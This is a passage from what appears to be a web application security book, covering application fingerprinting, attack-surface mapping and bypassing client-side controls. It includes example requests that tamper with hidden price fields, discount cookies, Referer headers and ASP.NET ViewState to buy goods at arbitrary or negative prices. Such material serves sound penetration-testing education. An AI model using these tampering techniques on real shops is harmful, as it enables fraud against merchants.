attempts to mislead about the web server software being used. The Found-

stone web site uses a misleading banner, but Httprint can still discover the

actual software. And the RedHat server is configured to present the nonver-

bose banner “Apache,” but Httprint is able to deduce the specific version of

Apache being used with a high degree of confidence.

Chapter 4 ■ Mapping the Application 83

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 83

File Extensions

File extensions used within URLs often disclose the platform or programming

language used to implement the relevant functionality. For example:

■■

asp — Microsoft Active Server Pages

■■

aspx — Microsoft ASP.NET

■■

jsp — Java Server Pages

■■

cfm — Cold Fusion

■■

php — the PHP language

■■

d2w — WebSphere

■■

pl — the Perl language

■■

py — the Python language

■■

dll — usually compiled native code (C or C++)

■■

nsf or ntf — Lotus Domino

Even if an application does not employ a particular file extension in its pub-

lished content, it is usually possible to verify whether the technology support-

ing that extension is implemented on the server. For example, if ASP.NET is

installed, requesting a nonexistent

.aspx file will return a customized error

page generated by the ASP.NET framework, as shown in Figure 4-7, whereas

requesting a nonexistent file with a different extension returns a generic error

message generated by the web server, as shown in Figure 4-8.

Figure 4-7: A customized error page indicating that the ASP.NET platform is present

on the server

84 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 84

Figure 4-8: A generic error message created when an unrecognized file extension is

requested

Using the automated content discovery techniques already described, it is

possible to request a large number of common file extensions and quickly con-

firm whether any of the associated technologies are implemented on the

server.

The divergent behavior described arises because many web servers map

specific file extensions to particular server-side components. Each different

component may handle errors (including requests for nonexistent content) in

a different way. Figure 4-9 shows the various extensions that are mapped to

different handler DLLs in a default installation of IIS 5.0.

Figure 4-9: File extension mappings in IIS 5.0

Chapter 4 ■ Mapping the Application 85

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 85

It is possible to detect the presence of each file extension mapping via the

different error messages generated when that file extension is requested.

In some cases, discovering a particular mapping may indicate the presence

of a web server vulnerability — for example, the

.printer and .ida/.idq

handlers in IIS have in the past been found vulnerable to buffer overflow

vulnerabilities.

Another common fingerprint to be aware of are URLs that look like the

following:

https://wahh-app/news/0,,2-421206,00.html

The comma-separated numbers towards the end of the URL are usually gen-

erated by the Vignette content management platform.

Directory Names

It is common to encounter subdirectory names that indicate the presence of an

associated technology. For example:

■■

servlet — Java servlets

■■

pls — Oracle Application Server PL/SQL gateway

■■

cfdocs or cfide — Cold Fusion

■■

SilverStream — The SilverStream web server

■■

WebObjects or {function}.woa — Apple WebObjects

■■

rails — Ruby on Rails

Session Tokens

Many web servers and web application platforms generate session tokens by

default with names that provide information about the technology in use. For

example:

■■

JSESSIONID — The Java Platform

■■

ASPSESSIONID — Microsoft IIS server

■■

ASP.NET_SessionId — Microsoft ASP.NET

■■

CFID/CFTOKEN — Cold Fusion

■■

PHPSESSID — PHP

86 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 86

Third-Party Code Components

Many web applications incorporate third-party code components to imple-

ment common functionality such as shopping carts, login mechanisms, and

message boards. These may be open source or may have been purchased from

an external software developer. When this is the case, the same components

often appear within numerous other web applications on the Internet, which

you can inspect to understand how the component functions. Often, different

features of the same component will be made use of by other applications,

enabling you to identify additional behavior and functionality beyond what is

directly visible in the target application. Also, the software may contain known

vulnerabilities that have been discussed elsewhere, or you may be able to

download and install the component yourself and perform a source code

review or probe it for defects in a controlled way.

HACK STEPS

■ Identify all entry points for user input, including URLs, query string para-

meters, POST data, cookies, and other HTTP headers processed by the

application.

■ Examine the query string format used by the application. If it does not

employ the standard format described in Chapter 3, try to understand

how parameters are being transmitted via the URL. Virtually all custom

schemes still employ some variation on the name/value model, so try to

understand how name/value pairs are being encapsulated into the non-

standard URLs you have identified.

■ Identify any out-of-bound channels via which user-controllable or other

third-party data is being introduced into the application’s processing.

■ View the HTTP Server banner returned by the application. Note that in

some cases, different areas of the application are handled by different

back-end components, and so different Server headers may be

received.

■ Check for any other software identifiers contained within any custom

HTTP headers or HTML source code comments.

■ Run the Httprint tool to fingerprint the web server.

■ If fine-grained information is obtained about the web server and other

components, research the software versions in use to identify any vulner-

abilities that may be exploited to advance an attack (see Chapter 17).

■ Review your map of application URLs, to identify any interesting-looking

file extensions, directories, or other subsequences that may provide clues

about the technologies in use on the server.

(continued)

Chapter 4 ■ Mapping the Application 87

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 87

HACK STEPS (continued)

■ Review the names of all session tokens issued by the application to iden-

tify the technologies being used.

■ Use lists of common technologies, or Google, to establish which tech-

nologies may be in use on the server, or discover other web sites and

applications that appear to be employing the same technologies.

■ Perform searches on Google for the names of any unusual cookies,

scripts, HTTP headers, and the like that may belong to third-party soft-

ware components. If you locate other applications in which the same

components are being used, review these to identify any additional

functionality and parameters that the components support, and verify

whether these are also present in your target application. Note that third-

party components may look and feel quite different in each implementa-

tion, due to branding customizations, but the core functionality, including

script and parameter names, is often the same. If possible, download and

install the component and analyze it to fully understand its capabilities

and if possible discover any vulnerabilities. Consult repositories of

known vulnerabilities to identify any known defects with the component

in question.

Identifying Server-Side Functionality

It is often possible to infer a great deal about server-side functionality and

structure, or at least make an educated guess, by observing clues that the

application discloses to the client.

Dissecting Requests

Consider the following URL, which is used to access a search function:

https://wahh-app.com/calendar.jsp?name=new%20applicants&isExpired=

0&startDate=22%2F09%2F2006&endDate=22%2F03%2F2007&OrderBy=name

As we have seen, the .jsp file extension indicates that Java Server Pages are

in use. You may guess that a search function will retrieve its information from

either an indexing system or a database; the presence of the

OrderBy parame-

ter suggests that a back-end database is being used, and that the value you

submit may be used as the

ORDER BY clause of a SQL query. This parameter

may well be vulnerable to SQL injection, as may any of the other parameters if

they are used in database queries (see Chapter 9).

88 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 88

Also of interest among the other parameters is the isExpired field. This

appears to be a Boolean flag specifying whether the search query should

include content which is expired. If the application designers did not expect

ordinary users to be able retrieve any expired content, changing this parame-

ter from 0 to 1 could identify an access control vulnerability (see Chapter 8).

The following URL, which allows users to access a content management

system, contains a different set of clues:

https://wahh-app.com/workbench.aspx?template=NewBranch.tpl&loc=

/default&ver=2.31&edit=false

Here, the .aspx file extension indicates that this is an ASP.NET application.

It also appears highly likely that the

template parameter is used to specify a

filename, and the

loc parameter is used to specify a directory. The possible file

extension

.tpl appears to confirm this, as does the location /default, which

could very well be a directory name. It is possible that the application retrieves

the template file specified and includes the contents into its response. These

parameters may well be vulnerable to path traversal attacks, allowing arbi-

trary files to be read from the server (see Chapter 10).

Also of interest is the

edit parameter, which is set to false. It may be that

changing this value to true will modify the registration functionality, poten-

tially enabling an attacker to edit items that the application developer did not

intend to be editable. The

ver parameter does not have any readily guessable

purpose, but it may be that modifying this will cause the application to per-

form a different set of functions that may be exploitable by an attacker.

Finally, consider the following request, which is used to submit a question to

application administrators:

POST /feedback.php HTTP/1.1

Host: wahh-app.com

Content-Length: 389

[email protected]&[email protected]&subject=

Problem+logging+in&message=Please+help...

As with the other examples, the .php file extension indicates that the func-

tion is implemented using the PHP language. Further, it is extremely likely

that the application is interfacing with an external email system, and it appears

that user-controllable input is being passed to that system in all relevant fields

of the email. The function may be exploitable to send arbitrary messages to

any recipient, and any of the fields may also be vulnerable to email header

injection (see Chapter 9).

Chapter 4 ■ Mapping the Application 89

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 89

HACK STEPS

■ Review the names and values of all parameters being submitted to the

application, in the context of the functionality which they support.

■ Try to think like a programmer, and imagine what server-side mecha-

nisms and technologies are likely to have been used to implement the

behavior that you can observe.

Extrapolating Application Behavior

Often, an application behaves in a consistent way across the range of its func-

tionality. This may be because different functions were written by the same

developer, or to the same design specification, or share some common code

components. In this situation, it may be possible to draw conclusions about

server-side functionality in one area and extrapolate these to another area.

For example, the application may enforce some global input validation

checks, such as sanitizing various kinds of potentially malicious input before

it is processed. Having identified a blind SQL injection vulnerability, you may

encounter problems exploiting it, because your crafted requests are being

modified in unseen ways by the input validation logic. However, there may be

other functions within the application that provide good feedback about the

kind of sanitization being performed — for example, a function that echoes

some user-supplied data back to the browser. You may be able to use this func-

tion to test different encodings and variations of your SQL injection payload,

to determine what raw input must be submitted to achieve the desired attack

string after the input validation logic has been applied. If you are lucky, the

validation works in the same way across the application, enabling you to

exploit the injection flaw.

Some applications use custom obfuscation schemes when storing sensitive

data on the client, to prevent casual inspection and modification of this data by

users (see Chapter 5). Some such schemes may be extremely difficult to deci-

pher given access to only a sample of obfuscated data. However, there may be

functions within the application where a user can supply an obfuscated string

and retrieve the original — for example, an error message may include the

deobfuscated data which led to the error. If the same obfuscation scheme is

used throughout the application, it may be possible to take an obfuscated

string from one location (for example a cookie), and feed it into the other func-

tion to decipher its meaning. It may also be possible to reverse engineer the

obfuscation scheme by submitting systematically varying values to the func-

tion and monitoring their deobfuscated equivalents.

90 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 90

Finally, errors are often handled in an inconsistent manner within the appli-

cation, with some areas trapping and handling errors gracefully, while other

areas simply crash and return verbose debugging information to the user (see

Chapter 14). In this situation, it may be possible to gather information from the

error messages returned in one area and apply it to other areas where errors

are gracefully handled. For example, by manipulating request parameters in

systematic ways and monitoring the error messages received, it may be possi-

ble to determine the internal structure and logic of the application component

concerned; if you are lucky, aspects of this structure may be replicated in other

areas.

HACK STEPS

■ Try to identify any locations within the application that may contain clues

about the internal structure and functionality of other areas.

■ It may not be possible to draw any firm conclusions here; however, the

cases identified may prove useful at a later stage of the attack when

attempting to exploit any potential vulnerabilities.

Mapping the Attack Surface

The final stage of the mapping process is to identify the various attack surfaces

exposed by the application, and the potential vulnerabilities that are com-

monly associated with each one. The following is a rough guide to some key

types of behavior and functionality that you may identify, and the kinds of

vulnerability that are most commonly found within each one. The remainder

of this book will be concerned with the practical details of how you can detect

and exploit each of these problems:

■■

Client-side validation — Checks may not be replicated on the server.

■■

Database interaction — SQL injection.

■■

File uploading and downloading — Path traversal vulnerabilities.

■■

Display of user-supplied data — Cross-site scripting.

■■

Dynamic redirects — Redirection and header injection attacks.

■■

force.

■■

Multistage login — Logic flaws.

■■

Session state — Predictable tokens, insecure handling of tokens.

■■

Access controls — Horizontal and vertical privilege escalation.

Chapter 4 ■ Mapping the Application 91

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 91

■■

User impersonation functions — Privilege escalation.

■■

Use of cleartext communications — Session hijacking, capture of cre-

dentials and other sensitive data.

■■

Off-site links — Leakage of query string parameters in the Referer

header.

■■

Interfaces to external systems — Shortcuts in handling of sessions

and/or access controls.

■■

Error messages — Information leakage.

■■

Email interaction — Email and/or command injection.

■■

Native code components or interaction — Buffer overflows.

■■

Use of third-party application components — Known vulnerabilities.

■■

Identifiable web server software — Common configuration weak-

nesses, known software bugs.

HACK STEPS

■ Understand the core functionality implemented within the application

and the main security mechanisms in use.

■ Identity all features of the application’s functionality and behavior that

are often associated with common vulnerabilities.

■ Formulate a plan of attack prioritizing the most interesting-looking func-

tionality and the most serious of the associated potential vulnerabilities.

Chapter Summary

Mapping the application is a key prerequisite to attacking it. While it may be

tempting to dive straight in and start probing for actual bugs, taking time to

gain a sound understanding of the application’s functionality, technologies,

and attack surface will pay dividends down the line.

As with almost all of web application hacking, the most effective approach

is to use manual techniques supplemented where appropriate by controlled

automation. There is no fully automated tool that can carry out a thorough

mapping of the application in a safe way. To do this, you need to use your

hands and draw on your own experience. The core methodology we have out-

lined involves:

■■

Manual browsing and user-directed spidering, to enumerate the appli-

cation’s visible content and functionality.

92 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 92

■■

Use of brute force combined with human inference and intuition to dis-

cover as much hidden content as possible.

■■

An intelligent analysis of the application, to identify its key functional-

ity, behavior, security mechanisms, and technologies.

■■

An assessment of the application’s attack surface, highlighting the most

promising functions and behavior for more focused probing into

exploitable vulnerabilities.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. While mapping an application, you encounter the following URL:

https://wahh-app.com/CookieAuth.dll?GetLogon?curl=

Z2Fdefault.aspx

What information can you deduce about the technologies employed on

the server, and how it is likely to behave?

2. The application you are targeting implements web forum functionality.

The only URL you have discovered is:

http://wahh-app.com/forums/ucp.php?mode=register

How might you obtain a listing of forum members?

3. While mapping an application, you encounter the following URL:

https://wahh-app.com/public/profile/Address.asp?action=

view&location=default

What information can you infer about server-side technologies? What

can you conjecture about other content and functionality that may

exist?

4. A web server’s responses include the following header:

Server: Apache-Coyote/1.1

What does this indicate about the technologies in use on the server?

5. You are mapping two different web applications, and you request the

URL

/admin.cpf from each application. The response headers returned

Chapter 4 ■ Mapping the Application 93

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 93

by each request are shown here. From these headers alone, what can

you deduce about the presence of the requested resource within each

application?

HTTP/1.1 200 OK

Server: Microsoft-IIS/5.0

Expires: Mon, 25 Jun 2007 14:59:21 GMT

Content-Location: http://wahh-app.com/includes/error.htm?404;http://

wahh-app.com/admin.cpf

Date: Mon, 25 Jun 2007 14:59:21 GMT

Content-Type: text/html

Accept-Ranges: bytes

Content-Length: 2117

HTTP/1.1 401 Unauthorized

Server: Apache-Coyote/1.1

WWW-Authenticate: Basic realm=”Wahh Administration Site”

Content-Type: text/html;charset=utf-8

Content-Length: 954

Date: Mon, 25 Jun 2007 15:07:27 GMT

Connection: close

94 Chapter 4 ■ Mapping the Application

70779c04.qxd:WileyRed 9/14/07 3:12 PM Page 94

Chapter 1 described how the core security problem with web applications

arises because clients can submit arbitrary input. Despite this fact, a large pro-

portion of web applications nevertheless rely upon various kinds of measures

implemented on the client side to control the data that it submits to the server.

In general, this represents a fundamental security flaw: the user has full con-

trol over the client and the data it submits, and can bypass any controls which

are implemented on the client side and not replicated on the server.

There are two broad ways in which an application may rely upon client-side

controls to restrict user input. First, an application may transmit data via the

client component, using some mechanism that it assumes will prevent the user

from modifying that data. Second, when an application gathers data that is

entered by the user, it may implement measures on the client side that control

the contents of that data before it is submitted. This may be achieved using

HTML form features, client-side scripts, or thick-client technologies.

We will look at examples of each kind of client-side control and describe

ways in which they can be bypassed.

Transmitting Data via the Client

It is very common to see an application passing data to the client in a form that

is not directly visible or modifiable by the end user, in the expectation that this

Bypassing Client-Side Controls

CHAPTER

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 95

data will be sent back to the server in a subsequent request. Often, the appli-

cation’s developers simply assume that the transmission mechanism used

will ensure that the data transmitted via the client will not be modified along

the way.

Because everything submitted from the client to the server is within the

user’s full control, the assumption that data transmitted via the client will not

be modified is usually false, and often leaves the application vulnerable to one

or more attacks.

You may reasonably wonder why, if a particular item of data is known and

specified by the server, the application would ever need to transmit this value

to the client and then read it back. In fact, writing applications in this way is

often an easier task for developers, because it removes the need to keep track

of all kinds of data within the user’s session. Reducing the amount of per-

session data being stored on the server can also improve the application’s

performance. Further, if an application is deployed on several load-balanced

servers, with users potentially interacting with more than one server to per-

form a multistep action, then it may not be straightforward to share server-

side data between the hosts that may handle the same user’s requests. Using

the client to transmit data can present a tempting solution to the problem.

However, transmitting sensitive data in this way is usually unsafe and has

been the cause of countless vulnerabilities in applications.

Hidden Form Fields

Hidden HTML form fields are a common mechanism for transmitting data

via the client in a superficially unmodifiable way. If a field is flagged as hid-

den, it is not displayed on-screen. However, the field’s name and value are

stored within the form and sent back to the application when the user submits

the form.

The classic example of this security flaw is a retailing application that stores

the prices of products within hidden form fields. In the early days of web

applications, this vulnerability was extremely widespread, and it by no means

has been eliminated today. Figure 5-1 shows a typical form.

Figure 5-1: A typical HTML form

96 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 96

The code behind this form is as follows:

<p>Product: Sony VAIO A217S</p>

<p>Quantity: <input size=”2” name=”quantity”>

</form>

Notice the form field called price, which is flagged as hidden. This field will

be sent to the server when the user submits the form:

POST /order.asp HTTP/1.1

Host: wahh-app.com

Content-Length: 23

quantity=1&price=1224.95

Now, although the price field is not displayed on-screen, and it is not

editable by the user, this is solely because the application has instructed the

browser to hide the field. Because everything that occurs on the client side is

ultimately within the user’s control, this restriction can be circumvented in

order to edit the price.

One way to achieve this is to save the source code for the HTML page, edit

the value of the field, reload the source into a browser, and click the Buy but-

ton. However, a more elegant and easier method is to use an intercepting

proxy to modify the desired data on the fly.

An intercepting proxy is tremendously useful when attacking a web appli-

cation and is the one truly indispensable tool that you need in your arsenal.

There are numerous such tools available, but the most functional and popu-

lar are:

■■

Burp Proxy (part of Burp Suite)

■■

WebScarab

■■

Paros

The proxy sits between your web browser and the target application. It

intercepts every request issued to the application, and every response received

back, for both HTTP and HTTPS. It can trap any intercepted message for

inspection or modification by the user. The proxies listed also have numerous

advanced functions to make your job easier, including:

■■

Fine-grained rules to control which messages are trapped.

■■

Regex-based replacement of message content.

Chapter 5 ■ Bypassing Client-Side Controls 97

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 97

■■

Automatic updating of the Content-Length header when messages are

modified.

■■

Browsing history and message cache.

■■

Ability to replay and remodify individual requests.

■■

Integration with other tools such as spiders and fuzzers.

If you have not installed or used a proxy tool before, see Chapter 19 for

instructions and for a comparison of the main tools available.

Once an intercepting proxy has been installed and suitably configured, you

can trap the request that submits the form, and modify the

price field to any

value, as shown in Figure 5-2.

Figure 5-2: Modifying the values of hidden form fields using an intercepting proxy

If the application processes the transaction based on the price submitted,

then you can purchase the product for any price of your choosing.

TIP If you find an application that is vulnerable in this way, see whether you

can submit a negative amount as the price. In some cases, applications have

actually accepted transactions using negative prices. The attacker receives a

refund to their credit card and also the goods which they ordered — a win-win

situation if ever there was one.

98 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 98

HTTP Cookies

Another common mechanism for transmitting data via the client is HTTP cook-

ies. As with hidden form fields, these are not normally displayed on-screen or

directly modifiable by the user. They can, of course, be modified using an inter-

cepting proxy, either by changing the server response that sets them, or subse-

quent client requests that issue them.

Consider the following variation on the previous example. When a cus-

tomer logs in to the application, she receives the following response:

HTTP/1.1 302 Found

Location: /home.asp

Set-Cookie: SessId=191041-1042

Set-Cookie: UID=1042

Set-Cookie: DiscountAgreed=25

This response sets three cookies, all of which are interesting. The first

appears to be a session token, which may be vulnerable to sequencing or other

attacks. The second appears to be a user identifier, which can potentially be

leveraged to exploit access control weaknesses. The third appears to represent

a discount rate that the customer will receive on purchases.

This third cookie points towards a classic case of relying on client-side con-

trols (the fact that cookies are normally unmodifiable) to protect data trans-

mitted via the client. If the application trusts the value of the

DiscountAgreed

cookie when it is submitted back to the server, then customers can obtain arbi-

trary discounts by modifying its value. For example:

POST /order.asp HTTP/1.1

Host: wahh-app.com

Cookie: SessId=191041-1042; UID=1042; DiscountAgreed=99

Content-Length: 23

quantity=1&price=1224.95

URL Parameters

Applications frequently transmit data via the client using preset URL parame-

ters. For example, when a user browses the product catalogue, the application

may provide them with hyperlinks to URLs like the following:

https://wahh-app.com/browse.asp?product=VAIOA217S&price=1224.95

When a URL containing parameters is displayed in the browser’s location

bar, any parameters can be trivially modified by any user without the use of

Chapter 5 ■ Bypassing Client-Side Controls 99

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 99

tools. However, there are many instances in which an application may expect

that ordinary users cannot view or modify URL parameters. For example:

■■

Where embedded images are loaded using URLs containing parameters.

■■

Where URLs containing parameters are used to load the contents of a

frame.

■■

Where a form uses the POST method and its target URL contains preset

parameters.

■■

Where an application uses pop-up windows or other techniques to con-

ceal the browser location bar.

Of course, in any such case the values of any URL parameters can be modi-

fied as previously using an intercepting proxy.

The Referer Header

Browsers include the Referer header within most HTTP requests. This is used

to indicate the URL of the page from which the current request originated —

either because the user clicked a hyperlink or submitted a form, or because the

page referenced other resources such as images. Hence, it can be leveraged as

a mechanism for transmitting data via the client: because the URLs processed

by the application are within its control, developers may assume that the

Ref-

erer

header can be used to reliably determine which URL generated a partic-

ular request.

For example, consider a mechanism that enables users to reset their pass-

word if they have forgotten it. The application requires users to proceed

through several steps in a defined sequence, before they actually reset their

password’s value with the following request:

POST /customer/ResetForgotPassword.asp HTTP/1.1

Referer: http://wahh-app.com/customer/ForgotPassword.asp

Host: wahh-app.com

Content-Length: 44

uname=manicsprout&pass=secret&confirm=secret

The application may use the Referer header to verify that this request orig-

inated from the correct stage (

ForgotPassword.asp), and if so allow the user to

reset their password.

However, because the user controls every aspect of every request, including

the HTTP headers, this control can be trivially circumvented by proceeding

directly to

ResetForgotPassword.asp, and using an intercepting proxy to fix

the value of the

Referer header to the value that the application requires.

100 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 100

The Referer header is strictly optional according to w3.org standards.

Hence although most browsers implement it, using it to control application

functionality should be regarded as a “hack.”

COMMON MYTH It is often assumed that HTTP headers are somehow

more “tamper-proof” than other parts of the request, such as the URL. This

may lead developers to implement functionality that trusts the values

submitted in headers such as Cookie and Referer, while performing proper

validation of other data such as URL parameters. This perception is false —

given the multitude of intercepting proxy tools that are freely available, any

amateur hacker who targets an application can change all request data with

trivial ease. It is rather like supposing that when the teacher comes to search

your desk, it is safer to hide your water pistol in the bottom drawer, because

she will need to bend down further to discover it.

HACK STEPS

■ Locate all instances within the application where hidden form fields,

cookies, and URL parameters are apparently being used to transmit data

via the client.

■ Attempt to determine or guess the purpose that the item plays in the

application’s logic, based on the context in which it appears and on clues

such as the parameter’s name.

■ Modify the item’s value in ways that are relevant to its purpose in the

application. Ascertain whether the application processes arbitrary values

submitted in the parameter, and whether this exposes the application to

any vulnerabilities.

Opaque Data

Sometimes, data transmitted via the client is not transparently intelligible,

because it has been encrypted or obfuscated in some way. For example, instead

of seeing a product’s price stored in a hidden field, you may see some cryptic

value being transmitted:

<p>Product: Sony VAIO A217S</p>

<p>Quantity: <input size=”2” name=”quantity”>

<input name=”enc” type=”hidden” value=”262a4844206559224f456864206668643

265772031383932654448a352484634667233683277384f2245556533327233666455225

242452a526674696f6471”>

</form>

Chapter 5 ■ Bypassing Client-Side Controls 101

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 101

When this is observed, you may reasonably infer that when the form is sub-

mitted, the server-side application will decrypt or deobfuscate the opaque string

and perform some processing on its plaintext value. This further processing may

be vulnerable to any kind of bug; however, in order to probe for and exploit this,

you will first need to wrap up your payload in the appropriate way.

HACK STEPS

Faced with opaque data being transmitted via the client, there are a several

possible avenues of attack:

■ If you know the value of the plaintext behind the opaque string, you can

attempt to decipher the obfuscation algorithm being employed.

■ As described in Chapter 4, the application may contain functions else-

where that you can leverage to return the opaque string resulting from a

piece of plaintext you control. In this situation, you may be able to

directly obtain the required string to deliver an arbitrary payload to the

function you are targeting.

■ Even if the opaque string is completely impenetrable, it may be possible

to replay its value in other contexts, to achieve some malicious effect. For

example, the enc parameter in the previously shown form may contain

an encrypted version of the product’s price. Although it is not possible to

produce the encrypted equivalent for an arbitrary price of your choosing,

you may be able to copy the encrypted price from a different, cheaper

product and submit this in its place.

■ If all else fails, you can attempt to attack the server-side logic that will

decrypt or deobfuscate the opaque string, by submitting malformed vari-

ations of it — for example, containing overlong values, different character

sets, and the like.

The ASP.NET ViewState

One commonly encountered mechanism for transmitting opaque data via the

client is the ASP.NET ViewState. This is a hidden field that is created by default

in all ASP.NET web applications, and contains serialized information about

the state of the current page. The ASP.NET platform employs the ViewState to

enhance server performance — it enables the server to preserve elements

within the user interface across successive requests without needing to main-

tain all of the relevant state information on the server side. For example, the

server may populate a drop-down list on the basis of parameters submitted by

the user. When the user makes subsequent requests, the browser does not

submit the contents of the list back to the server. However, the browser does

submit the hidden ViewState field, which contains a serialized form of the list.

The server deserializes the ViewState and recreates the same list that is pre-

sented back to the user again.

102 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 102

In addition to this core purpose of the ViewState, developers can use it to

store arbitrary information across successive requests. For example, instead of

saving the product’s price in a hidden form field, an application may save it in

the ViewState as follows:

string price = getPrice(prodno);

ViewState.Add(“price”, price);

The form returned to the user will now look something like this:

<input type=”hidden” name=”__VIEWSTATE” id=”__VIEWSTATE”

value=”/wEPDwUKMTIxNDIyOTM0Mg8WAh4FcHJpY2UFBzEyMjQuOTVkZA==” />

<p>Product: Sony VAIO A217S</p>

<p>Quantity: <input name=”quantity” id=”quantity” />

</form>

and when the user submits the form, their browser will send the following:

POST /order.aspx HTTP/1.1

Host: wahh-app.com

Content-Length: 95

__VIEWSTATE=%2FwEPDwUKMTIxNDIyOTM0Mg8WAh4FcHJpY2UFBzEyMjQuOTVkZA%3D%3D&q

uantity=1&buy=Buy%21

The request apparently does not contain the product price — only the quan-

tity ordered and the opaque ViewState parameter. Changing that parameter at

random results in an error message, and the purchase is not processed.

The ViewState parameter is actually a Base64-encoded string, which can be

easily decoded:

FF 01 0F 0F 05 0D 0A 31 32 31 34 32 32 39 33 34 ; ÿ......121422934

32 0F 16 02 1E 05 70 72 69 63 65 05 07 31 32 32 ; 2.....price..122

34 2E 39 35 64 64 ; 4.95dd

TIP When you are attempting to decode what appears to be a Base64-

encoded string, a common mistake is to begin decoding at the wrong position

within the string. Because of the way Base64 encoding works, if you start at the

wrong position, the decoded string will contain gibberish. Base64 is a block-

based format in which each 4 bytes of encoded data translates into 3 bytes of

decoded data. Hence, if your attempts to decode a Base64 string do not

uncover anything meaningful, try starting from four adjacent offsets into the

encoded string. For example, cycling through the first four offsets into

Hh4aGVsbG8gd29ybGQu generates the following results:

— — [ È ÛÜ>

‡††VÆÆò v÷&Æ

á¡•±±¼ ´Y½É±

hello world.

Chapter 5 ■ Bypassing Client-Side Controls 103

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 103

There are two versions of the ViewState format, corresponding to different

versions of ASP.NET. Version 1.1 is a simple text-based format that is effec-

tively a compressed form of XML. Version 2, which is becoming more preva-

lent, is a binary format and is shown in the example. String-based data can be

easily spotted, and the decoded ViewState clearly contains the product price

that was previously stored in a hidden HTML form field. You can simply

change the value of the price parameter in a hex editor.

FF 01 0F 0F 05 0D 0A 31 32 31 34 32 32 39 33 34 ; ÿ......121422934

32 0F 16 02 1E 05 70 72 69 63 65 05 01 31 64 64 ; 2.....price..1dd

NOTE Strings within version 2 of the ViewState are length-prepended, so

changing the price parameter from 1224.95 to 1 also requires that you change

the length from 7 to 1, shown here.

You can then reencode the modified structure as Base64, and submit the

new ViewState value to the application:

POST /order.aspx HTTP/1.1

Host: wahh-app.com

Content-Length: 87

__VIEWSTATE=%2FwEPDwUKMTIxNDIyOTM0Mg8WAh4FcHJpY2UFATFkZA%3d%3d&quantity=

1&cmdBuy=Buy%21

which enables you to purchase the product at a price of 1.

Unfortunately, however, hacking ASP.NET applications is not usually as

simple as this. There is an option within ASP.NET for the platform to include a

keyed hash within the ViewState structure. This option is often on by default

but can be explicitly activated by adding the following to the page declaration:

EnableViewStateMac=”true”

The EnableViewStateMac option is activated in around 90% of today’s

ASP.NET applications, meaning that the ViewState parameter cannot be

tampered with without breaking the hash. In the previous example, using this

option results in the following ViewState:

FF 01 0F 0F 05 0A 31 32 31 34 32 32 39 33 34 32 ; ÿ.....1214229342

0F 16 02 1E 05 70 72 69 63 65 05 07 31 32 32 34 ; .....price..1224

2E 39 35 64 64 C4 75 60 70 9F 10 8B 61 04 15 27 ; .95ddÄu`pŸ.‹a..’

A1 06 1E F0 35 16 F0 46 A8 ; ¡..ð5.ðF¨

The additional data after the end of the serialized form data is the keyed hash

of the preceding structure. If you now try to modify the price parameter, you

cannot create a valid hash without knowing the secret key, which is stored on the

server. Changing the price alone returns the error message shown in Figure 5-3.

104 Chapter 5 ■ Bypassing Client-Side Controls

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 104

Figure 5-3: ASP.NET rejects requests containing a modified ViewState

when the EnableViewStateMac option is set.

Even if the ViewState parameter is properly protected to prevent tampering,

it may still contain sensitive data stored by the application that could be of use

to an attacker. You can use the ViewState deserializer in Burp Proxy to decode

and render the ViewState on any given page to identify any sensitive data it

contains, as shown in Figure 5-4.

Figure 5-4: Burp Proxy can decode and render the ViewState, allowing you to review its

contents and edit these if the EnableViewStateMac option is not set.

Chapter 5 ■ Bypassing Client-Side Controls 105

70779c05.qxd:WileyRed 9/16/07 5:14 PM Page 105

HACK STEPS

■ If you are attacking an ASP.NET application, verify whether the

EnableViewStateMac option is activated. This is indicated by the pres-

ence of a 20-byte hash at the end of the ViewState structure, and you can

use the decoder in Burp Proxy to confirm whether this is present.

■ Even if the ViewState is protected, decode the ViewState parameter on

various different application pages to discover whether the application is

using the ViewState to transmit any sensitive data via the client.

■ Try to modify the value of a specific parameter within the ViewState,

without interfering with its structure, and see whether an error message

results.

■ If you can modify the ViewState without causing errors, you should

review the function of each parameter within the ViewState, and whether

the application uses it to store any custom data. Try to submit crafted

values as each parameter, to probe for common vulnerabilities, as you

would for any other item of data being transmitted via the client.

■ Note that the keyed hash option may be enabled or disabled on a per-

page basis, so it may be necessary to test each significant page of the

application for ViewState hacking vulnerabilities.

Capturing User Data: HTML Forms

The other principal way in which applications use client-side controls to

restrict data submitted by clients occurs with data that was not originally spec-

ified by the server but was gathered on the client computer itself.

HTML forms are the simplest and most common mechanism for capturing

input from the user and submitting it to the server. In the most basic uses of this

method, users type data into named text fields, which are submitted to the server

as name/value pairs. However, forms can be used in other ways, which are

designed to impose restrictions or perform validation checks on the user-supplied

data. When an application employs these client-side controls as a security mech-

anism, to defend itself against malicious input, the controls can usually be triv-

ially circumvented, leaving the application potentially vulnerable to attack.

Length Limits

Consider the following variation on the original HTML form, which imposes a

maximum length of 3 on the quantity field:

<p>Product: Sony VAIO A217S</p>

<p>Quantity: <input size=”2” maxlength=”3” name=”quantity”>

